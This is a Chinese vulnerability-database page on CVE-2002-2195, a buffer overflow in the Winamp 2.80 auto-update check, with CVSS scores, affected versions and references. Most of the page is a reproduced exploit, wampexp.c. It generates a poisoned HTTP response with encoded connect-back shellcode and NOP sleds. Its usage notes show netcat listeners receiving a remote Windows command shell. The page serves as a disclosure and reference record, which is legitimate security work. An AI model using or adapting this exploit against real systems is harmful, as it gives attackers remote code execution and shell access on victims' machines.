CVE-2002-2195
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:34
NMCOE    

[原文]Buffer overflow in the version update check for Winamp 2.80 and earlier allows remote attackers who can spoof www.winamp.com to execute arbitrary code via a long server response.


[CNNVD]Nullsoft Winamp自动更新检测缓冲区溢出漏洞(CNNVD-200212-580)

        Winamp 2.80及其早期版本的版本自动更新存在缓冲区溢出漏洞。假冒www.winamp.com的远程攻击者可以借助超长服务器响应执行任意代码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:nullsoft:winamp:2.61::full
cpe:/a:nullsoft:winamp:2.62::standard
cpe:/a:nullsoft:winamp:2.80
cpe:/a:nullsoft:winamp:2.78
cpe:/a:nullsoft:winamp:2.73
cpe:/a:nullsoft:winamp:2.70::full
cpe:/a:nullsoft:winamp:2.74
cpe:/a:nullsoft:winamp:2.79
cpe:/a:nullsoft:winamp:2.75
cpe:/a:nullsoft:winamp:2.64::standard
cpe:/a:nullsoft:winamp:2.65
cpe:/a:nullsoft:winamp:2.72
cpe:/a:nullsoft:winamp:2.73::full
cpe:/a:nullsoft:winamp:2.60::lite
cpe:/a:nullsoft:winamp:2.71
cpe:/a:nullsoft:winamp:2.76
cpe:/a:nullsoft:winamp:2.70

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2195
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2195
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-580
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5170
(PATCH)  BID  5170
http://www.iss.net/security_center/static/9488.php
(UNKNOWN)  XF  winamp-auto-update-bo(9488)

- 漏洞信息

Nullsoft Winamp自动更新检测缓冲区溢出漏洞
中危 缓冲区溢出
2002-12-31 00:00:00 2006-03-17 00:00:00
远程  
        Winamp 2.80及其早期版本的版本自动更新存在缓冲区溢出漏洞。假冒www.winamp.com的远程攻击者可以借助超长服务器响应执行任意代码。

- 公告与补丁

        2c79cbe14ac7d0b8472d3f129fa1df has contributed an unofficial patch which is reported to hardcode the Winamp update site to the static IP address 205.188.245.120. The patch is available as an attachment to the referenced BugTraq post.
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21595)

Nullsoft Winamp 2.80 Automatic Update Check Buffer Overflow Vulnerability (EDBID:21595)
windows remote
2002-07-03 Verified
0 Anonymous
N/A [点击下载]
source: http://www.securityfocus.com/bid/5170/info

Nullsoft Winamp is a media player for Microsoft Windows supporting MP3 and other filetypes.

Winamp is vulnerable to a buffer overflow condition when checking for updated versions. A malicious server located at www.winamp.com may return a malicious response. Exploitation may result in the execution of arbitrary code as the Winamp process.

It may be possible to exploit this vulnerability if an attacker can control the resolution of the www.winamp.com domain, possibly through DNS cache poisoning. 

/*

	wampexp.c

	July 3rd, 2002

	

	Winamp 2.80a and all previous remote exploit (connect-back styles)



        winamp has an option, enabled by default, which checks for the latest

        version from www.winamp.com and will then notify the user of a possible

        upgrade via a messagebox..

	

        unfortunately, if it were to receive a huge response via some nameserver

        corruption the thread parsing the response is thrown into an infinite

        loop and eventually the exception dispatcher is called.. and THEN like

        most of the time under windows a big, bad, overflow occurs..

        

        ex: # (./wampexp 192.168.0.1 5555)|nc -l -p 80

            # nc -l -p 5555

            *poisoned user opens winamp*

            # nc -l -p 5555

            Microsoft Windows 2000 [Version 5.00.2195]

            (C) Copyright 1985-2000 Microsoft Corp.

            

            C:\>

        

	sincerely, 2c79cbe14ac7d0b8472d3f129fa1df55

	(c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com)

	

	yes, yahoo took away my 2! ;~~~

*/



#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <netdb.h>

#include <sys/errno.h>

#include <unistd.h>



// a minimal HTTP header and fake version

unsigned char payload[35904] =

"\x4f\x4b\x0d\x0a\x0d\x0a\x39\x2e\x39\x39\x0d\x0a\x0d\x0a";



// a gruesome hack of dark spyrits jill.c shell that further alters the

// startupinfo structure (as this isn't a service) and calls ExitThread

// to keep things invisible..



unsigned char shell[] =

"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"

"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"

"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"

"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"

"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"

"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"

"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"

"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"

"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"

"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"

"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"

"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"

"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"

"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"

"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"

"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"

"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"

"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"

"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"

"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"

"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"

"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"

"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"

"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"

"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"

"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"

"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"

"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"

"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"

"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"

"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"

"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"

"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"

"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"

"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"

"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"

"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"

"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"

"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"

"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"

"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"

"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"

"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"

"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";



main(char argc, char **argv){

	int i;

        unsigned short int      a_port;

        unsigned long           a_host;

        struct hostent          *ht;

        struct sockaddr_in      sin;	

        

        if (argc < 3){

        	printf("Winamp 2.80a remote exploit (7/3/2002)\n");

        	printf("c79cbe14ac7d0b8472d3f129fa1df55@yahoo.com\n\n");

        	printf("usage: %s <localhost> <localport>\n\n", argv[0]);

        	printf("NOTE: target os is 2000.. probably works on all\n");

        	printf("winamp versions prior to 2.80a as there are no \n");

        	printf("dependancies on winamp, only the static ws2help\n\n");

        	exit(-1);

	}



	// blatantly ripped! *TEEHEEEHHEH*

        a_port  = htons(atoi(argv[2]));

        a_port ^= 0x9595;

        if ((ht = gethostbyname(argv[1])) == 0){herror(argv[1]);exit(-1);}

        a_host  = *((unsigned long *)ht->h_addr);

        a_host ^= 0x95959595;

        shell[385] = ((a_port) & 0xff);

        shell[386] = ((a_port >> 8) & 0xff);        

        shell[390] = ((a_host) & 0xff);

        shell[391] = ((a_host >> 8) & 0xff);

        shell[392] = ((a_host >> 16) & 0xff);

        shell[393] = ((a_host >> 24) & 0xff);

        

        strcat(payload, shell);

        

        // lots of NOPs

        for(i=792;i<9704;i++)

                strcat(payload, "\x90");



        // we land here when we jmp ebx the second time

        // this sets ebx to the start of our shell, and jmps back

        strcat(payload, "\x81\xc3\x11\x11\x11\x01\x81\xeb\x07\x37");

	strcat(payload, "\x11\x01\xff\xe3");



        // lots more NOPs for lots more fun

        for(i=9718;i<35809;i++)

                strcat(payload, "\x90");

 

        // and bh, dl; jmp ebx.. this allows us to jmp back into an area

        // where we can put some real code

        strcat(payload, "\x22\xfa\xff\xe3");

        

        // our "eip" (call ecx; ntdll.dll@0x11936)

        // jmp ebx; ws2help.dll@0xdd6 (v5.0.2134.1, static on all service packs)

        strcat(payload, "\xd6\x19\x02\x75");



	// if ws2help doesn't match for some reason, use this call ebx..

	// dependant on the winamp in_wm.dll plugin

	//strcat(payload, "\x57\x22\x12\x01");

 

        strcat(payload, "\x0d\x0a");



	printf("%s", payload);        

}

		

- 漏洞信息

60114
Winamp Version Update Check MiTM Server Response Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2002-07-05 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站